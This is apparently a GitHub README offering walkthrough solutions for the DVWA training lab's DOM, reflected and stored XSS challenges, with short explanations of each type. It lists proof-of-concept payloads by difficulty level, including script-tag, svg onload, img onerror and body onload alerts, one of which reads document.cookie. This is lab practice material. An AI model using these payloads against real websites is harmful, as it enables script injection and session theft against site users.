Skip to content

Welcome to the DVWA XSS Solutions repository! This repository contains comprehensive solutions for Cross-Site Scripting (XSS) vulnerabilities in the Damn Vulnerable Web Application (DVWA). These solutions are meticulously provided by Nihar Rathod, also known as BugBot19

Notifications You must be signed in to change notification settings

kashrathod19/XSS-DVWA-SOLUTION

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

15 Commits
 
 

Repository files navigation

XSS-DVWA-SOLUTION

Welcome to the DVWA XSS Solutions repository! This repository contains comprehensive solutions for Cross-Site Scripting (XSS) vulnerabilities in the Damn Vulnerable Web Application (DVWA). These solutions are meticulously provided by Nihar Rathod, also known as BugBot19

Overview

The Damn Vulnerable Web Application (DVWA) is a popular web application designed for security professionals and enthusiasts to practice their web security skills in a legal and safe environment. This repository focuses on addressing and mitigating XSS vulnerabilities, one of the most common and critical web security issues.

image

XSS (DOM)

A DOM-based cross-site scripting (XSS) attack happens when a threat actor modifies the document object model (DOM) environment in the victim's browser. So, while the HTML itself doesn't change, the code on the client side executes differently.

LOW

Payload-<script>alert('BugBot19 was here')</script>

image

image

MEDIUM

Payload-<script>alert('BugBot19 was here')</script>

image

image

High

Payload-<script>alert('BugBot19 was here')</script>

image

image

XSS (Reflected)

reflected XSS is a kind of cross-site scripting attack, where malicious script is injected into websites that are trusted or otherwise benign. Typically, the injection occurs when an unsuspecting user clicks on a link that is specifically designed to attack the website they are visiting.

LOW/MEDIUM/HIGH

During the research phase, I found out that one of the payloads can be used in all three levels the payload is mentioned below

Payload-<svg onload=alert('BugBot19 was here')>

image

image

image

image

image

image

XSS (Stored)

Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.

Low

Payload - <script>alert(document.domain)</script>

image

image

Medium

Payload - <img src=x onerror=alert(document.cookie)>

Change the text 'size' and 'max length'

image

image

High

Payload - <body onload=alert('Bugbot19')>

Change the text 'size' and 'max length'

image

image

About

Welcome to the DVWA XSS Solutions repository! This repository contains comprehensive solutions for Cross-Site Scripting (XSS) vulnerabilities in the Damn Vulnerable Web Application (DVWA). These solutions are meticulously provided by Nihar Rathod, also known as BugBot19

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published